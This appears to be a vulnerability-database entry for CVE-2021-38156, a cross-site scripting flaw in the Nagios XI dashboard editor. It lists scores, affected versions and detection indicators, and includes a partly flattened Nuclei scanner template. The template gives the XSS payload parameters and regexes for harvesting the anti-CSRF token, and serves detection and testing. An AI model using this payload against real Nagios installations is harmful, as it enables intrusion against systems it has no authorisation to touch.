CVE-2021-38156
published 2021-09-15CVE-2021-38156: In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.
PriorityP350medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EXPLOIT
EPSS
88.94%
99.8th percentile
In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | < 5.8.6 | 5.8.6 |
Detection & IOCsextracted from sources · hover to see the quote
url/nagiosxi/dashboards/manage.php
commandalert(document.domain)&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}
- →Detect XSS exploitation attempt by matching the string 'data-title="">alert(document.domain)' in the HTTP response body of /nagiosxi/dashboards/manage.php
- →The attack targets the dashboard edit functionality in Nagios XI; monitor POST requests to /nagiosxi/dashboards/manage.php containing XSS payloads in the title or background parameters alongside the nsp token
- ·Exploitation requires the attacker to be authenticated as an administrative user; the attack is stored/reflected XSS triggered when an admin edits a dashboard. The NSP anti-CSRF token must be harvested from the page prior to submission. ↗
- ·The vulnerability is fixed in Nagios XI 5.8.6 and later; detection rules should be scoped to versions prior to 5.8.6. ↗
CVSS provenance
nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Nagios XI < 5.8.6 - Cross-Site Scripting
nuclei·CVSS 5.4
CVE-2021-38156 [MEDIUM] Nagios XI < 5.8.6 - Cross-Site Scripting
Nagios XI alert(document.domain)&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}
- |
GET /nagiosxi/dashboards/manage.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- 'data-title="">alert(document.domain)'
- type: word
part: header_5
words:
- text/html
- type: status
status:
- 200
extractors:
- type: regex
name: nsp
part: body
group: 1
regex:
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
internal: true
- type: regex
name: nsp_auth
part: body
group: 1
regex:
- "var nsp_str = ['\"](.*)['\"];"
internal: true
# digest: 4a0a0047304502203b735df3e5a78722406b4f8bff7c34f016806533736ed5f3efbcce2a556ab751022100b7b1173a3dcdad6b7cf5b905b1fcdde0ae600b722ce29c489668432ffcca4c7a:922c64590222798bb76
No writeups or analysis indexed.
2021-09-15
Published